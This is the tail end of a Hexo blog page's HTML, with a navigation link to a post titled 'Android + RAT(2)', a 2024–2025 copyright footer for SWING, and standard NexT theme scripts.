                <a href="/2025/09/30/313202_250930/" rel="next" title="Android + RAT(2)">
                  Android + RAT(2) <i class="fa fa-angle-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






</div>
  </main>

  <footer class="footer">
    <div class="footer-inner">

  <div class="copyright">
    &copy;
    
      2024 – <span itemprop="copyrightYear">2025</span>
    
    <span class="with-love">
      <i class="fa fa-heart"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">SWING</span>
  </div>
  <div class="powered-by">Powered by <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & <span class="exturl" data-url="aHR0cHM6Ly90aGVtZS1uZXh0LmpzLm9yZy9tdXNlLw==">NexT.Muse</span>
  </div>

    </div>
  </footer>

  
  <div class="toggle sidebar-toggle" role="button">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>
  <div class="sidebar-dimmer"></div>
  <div class="back-to-top" role="button" aria-label="Back to top">
    <i class="fa fa-arrow-up fa-lg"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


  
  <script src="https://cdnjs.cloudflare.com/ajax/libs/animejs/3.2.1/anime.min.js" integrity="sha256-XL2inqUJaslATFnHdJOi9GfQ60on8Wx1C2H8DYiN1xY=" crossorigin="anonymous"></script>
<script src="/js/comments.js"></script><script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/schemes/muse.js"></script><script src="/js/sidebar.js"></script><script src="/js/next-boot.js"></script>

  






  





</body>
</html>
